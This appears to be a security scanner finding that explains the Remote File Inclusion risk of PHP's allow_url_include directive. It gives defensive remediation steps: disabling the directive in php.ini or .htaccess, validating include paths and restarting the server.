PHP allow_url_include Is Enabled
Description
The PHP configuration directive allow_url_include is currently enabled on this server. This setting permits PHP include functions (such as include(), require(), include_once(), and require_once()) to retrieve and execute files from remote locations via HTTP or FTP protocols. When combined with insufficient input validation, this configuration significantly increases the risk of Remote File Inclusion (RFI) attacks, where attackers can inject and execute malicious code from external sources. This directive has been disabled by default since PHP 5.2 due to security concerns.
Remediation
Disable the allow_url_include directive immediately unless there is a specific, documented business requirement for remote file inclusion. This setting can be disabled through the following methods:
Method 1: Modify php.ini (Recommended)
Locate your php.ini configuration file and set:
allow_url_include = Off
Method 2: Configure via .htaccess (Apache only)
Add the following directive to your .htaccess file:
php_flag allow_url_include Off
Additional Security Measures:
• Review all code using
include(), require(), include_once(), and require_once() functions to ensure user input is never directly used in file paths• Implement whitelist-based validation for any dynamic file inclusion requirements
• Consider disabling
allow_url_fopen as well if remote file access is not required• Restart your web server after making configuration changes to apply the new settings